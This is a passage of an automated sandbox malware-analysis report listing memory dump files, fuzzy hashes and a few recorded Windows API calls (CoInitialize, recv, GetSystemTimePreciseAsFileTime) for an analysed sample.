                                                          • Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466526095.0000000000546000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466560000.0000000000547000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466652427.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466668941.0000000000556000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466743514.0000000000557000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466970424.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467010231.00000000005CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467081116.00000000005CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467102225.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467155428.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467186116.00000000005E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 4126522fe971dccfdc1542597d63c445241fe0407f45074cea61d3f3fa9f7bcb
                                                          • Instruction ID: ad66648136e4fca511d4dd13a30377d974dda5ab63e7935b4d7ed5a365a50cd7
                                                          • Opcode Fuzzy Hash: 4126522fe971dccfdc1542597d63c445241fe0407f45074cea61d3f3fa9f7bcb
                                                          • Instruction Fuzzy Hash: 08C08C3C03220047FA1C5E3850888A8720A9A077283F00B8EE1314B3F1CB32DC33C6A0
                                                          APIs
                                                          • CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 002DB3C7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                          • Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466526095.0000000000546000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466560000.0000000000547000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466652427.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466668941.0000000000556000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466743514.0000000000557000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466970424.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467010231.00000000005CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467081116.00000000005CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467102225.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467155428.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467186116.00000000005E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Initialize
                                                          • String ID:
                                                          • API String ID: 2538663250-0
                                                          • Opcode ID: 3f8dd5827f71a65d099df5db6ef26fc4265ff750f5cd1ab728375234fe2237bf
                                                          • Instruction ID: 11a7b1e9a872eca480d0380a5588e146a6f9b14407d030e1da45c4eee93fac02
                                                          • Opcode Fuzzy Hash: 3f8dd5827f71a65d099df5db6ef26fc4265ff750f5cd1ab728375234fe2237bf
                                                          • Instruction Fuzzy Hash: 33B10570A10268DFEB29CF15C8A4BDEB7B5EF19304F9045D9E80967281D775AE88CF90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1469582370.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_54a0000_UyiH4t5dph.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 92ed65d8c9f2b7881127ebfdd820266de6907e55d4023057fff3986703571d41
                                                          • Instruction ID: ccc4aef02d1188d4819e9cde154aad9fc808d8ecd74966db4b8b35bc9be2b4da
                                                          • Opcode Fuzzy Hash: 92ed65d8c9f2b7881127ebfdd820266de6907e55d4023057fff3986703571d41
                                                          • Instruction Fuzzy Hash: C5110CAB04C110FE71C1C9636B1CBFA2B2BE1FA334731842BF80FCA441E2668A5B4075
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1469582370.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_54a0000_UyiH4t5dph.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3ece76f7ad017dad717aced1a1d6fe5b8fc7eee2b7accd9bd56453f9352c7716
                                                          • Instruction ID: f0b5867a7ad62e678da38500fa046cc22b4578d8e2069d82212d5586146b99b3
                                                          • Opcode Fuzzy Hash: 3ece76f7ad017dad717aced1a1d6fe5b8fc7eee2b7accd9bd56453f9352c7716
                                                          • Instruction Fuzzy Hash: EB0157AB00C214FE71C2C5572B1CAFA2A6FE5F63347718427F40FC6441D2A54E5B5035
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1469582370.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_54a0000_UyiH4t5dph.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7295be4ed58a1a11e2f1dee123b4e0dfc085798205a2702d3d85c58a064dda38
                                                          • Instruction ID: 6111d650bef2fc425f47ae5550deebddd454f167d54e85b19477e8c75b15adf2
                                                          • Opcode Fuzzy Hash: 7295be4ed58a1a11e2f1dee123b4e0dfc085798205a2702d3d85c58a064dda38
                                                          • Instruction Fuzzy Hash: 2901CCAB00C210FEA1C2D9122B2CAFA3B6BE6F63347718427F44FDA441D2A58A5B5571
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1469582370.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_54a0000_UyiH4t5dph.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cdea47788c7b0c4bd2f52a9cf1211beb4c06ed021b83f25578246bee0d5c7cd0
                                                          • Instruction ID: a40127aed061feba9994496700c66c04b4531a448f96f0a4d98eadbd5453650c
                                                          • Opcode Fuzzy Hash: cdea47788c7b0c4bd2f52a9cf1211beb4c06ed021b83f25578246bee0d5c7cd0
                                                          • Instruction Fuzzy Hash: EC01DEBB00C214FEB1C2C5572B1CAFA6B6BE5FA3347718427F84FDA452D2658A5B4031
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1469582370.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_54a0000_UyiH4t5dph.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3df976d7651559d5f117320dec696d1ace170ab89a865ad214b73fcd35ed9e62
                                                          • Instruction ID: 1d000c96a5398a81d5421ffd707cb89486292af616ab41f27964120af5445ea1
                                                          • Opcode Fuzzy Hash: 3df976d7651559d5f117320dec696d1ace170ab89a865ad214b73fcd35ed9e62
                                                          • Instruction Fuzzy Hash: 560147AF40D415FE62C2CA231B1CAF52B17A5FA23836040A3F14F9B092C6618A478125
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1469582370.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_54a0000_UyiH4t5dph.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2645bbd520fd55d11de82b0a188c603ccaba678c0df3c37f72243db80fe73db6
                                                          • Instruction ID: 3d641e18b2776acb5ab2d110a15102dd7a97655dfc806651d3ca3c45802325ab
                                                          • Opcode Fuzzy Hash: 2645bbd520fd55d11de82b0a188c603ccaba678c0df3c37f72243db80fe73db6
                                                          • Instruction Fuzzy Hash: 4AF090AF40D001FE66C2C5636B1CBFA2A2BE5F63347718457F44F8A051E2618A578565
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1469582370.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_54a0000_UyiH4t5dph.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bd33f6be8ecf67ff4059e88da6905cca7a2b8ff0b220ea4743bf0e53e76de806
                                                          • Instruction ID: b9db9e4184711fd50a8aa981a445d94dd6426db94698eb50b5bca8f99404a867
                                                          • Opcode Fuzzy Hash: bd33f6be8ecf67ff4059e88da6905cca7a2b8ff0b220ea4743bf0e53e76de806
                                                          • Instruction Fuzzy Hash: F0F0287B40D144DF92C2CA62661C6F87B32F5F3234721845BE08ECA042C1214A4F8731
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1469582370.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_54a0000_UyiH4t5dph.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4b1f279eef9369932743afef7ef8977204913997e3d99ed37b195c36c9cf1f32
                                                          • Instruction ID: ca6cb865b80d77a08cba794ff34f61003997957be538189d6e958144881f239d
                                                          • Opcode Fuzzy Hash: 4b1f279eef9369932743afef7ef8977204913997e3d99ed37b195c36c9cf1f32
                                                          • Instruction Fuzzy Hash: 1AE0C2AB59C111EDA2CBDB62AA4C7F52727F6F43143304463E04FCE842D2294A278A35
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1469582370.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_54a0000_UyiH4t5dph.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f212827d7f2b4118675ff47733688a992201058d5e58600d7aa9d3dd53b8d783
                                                          • Instruction ID: ab286b5a756b2f79ca3755bef8f7c37e6f63b77103a01c9427b5d3ec12f0e787
                                                          • Opcode Fuzzy Hash: f212827d7f2b4118675ff47733688a992201058d5e58600d7aa9d3dd53b8d783
                                                          • Instruction Fuzzy Hash: 17D05E6B04E011DE61C1C5622A1CAFA232AF0F63243718457F04F89491C22489179935
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1469582370.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_54a0000_UyiH4t5dph.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 23191a1ac6b79ed12bf0397e9ff67dd98ea85db47ca9739804725e0492616705
                                                          • Instruction ID: ace3ec02ef8b032918bad47fc9714e50c1dbbcea262d9d5b831989a1d734f4a9
                                                          • Opcode Fuzzy Hash: 23191a1ac6b79ed12bf0397e9ff67dd98ea85db47ca9739804725e0492616705
                                                          • Instruction Fuzzy Hash: 6BD02EAB00C880CFF282C111BE1DBFB635687B4B08F90809BD88FCB1D2C2B8481BC412
                                                          APIs
                                                          • recv.WS2_32(?,?,00000004,00000000), ref: 002DE10B
                                                          • recv.WS2_32(?,?,00000008,00000000), ref: 002DE140
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                          • Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466526095.0000000000546000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466560000.0000000000547000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466652427.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466668941.0000000000556000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466743514.0000000000557000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466970424.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467010231.00000000005CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467081116.00000000005CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467102225.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467155428.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467186116.00000000005E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: recv
                                                          • String ID:
                                                          • API String ID: 1507349165-0
                                                          • Opcode ID: 036501db4efe4c8224eb2508c404d351d231cd0cd2bcc9c75066dbdbc1e86c48
                                                          • Instruction ID: 3440e0ef4001966ee099429a6df0c557792e7c9b9b383df098f71d84ffc28a57
                                                          • Opcode Fuzzy Hash: 036501db4efe4c8224eb2508c404d351d231cd0cd2bcc9c75066dbdbc1e86c48
                                                          • Instruction Fuzzy Hash: 0D312671A142489FDB21DBADCC81BEF77BCEB09724F114626F915E7381C674AC458BA0
                                                          APIs
                                                          • GetSystemTimePreciseAsFileTime.KERNEL32(?,002ECF52,?,00000003,00000003,?,002ECF87,?,?,?,00000003,00000003,?,002EC4FD,002D2FB9,00000001), ref: 002ECC03
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                          • Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466526095.0000000000546000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466560000.0000000000547000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466652427.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466668941.0000000000556000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466743514.0000000000557000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
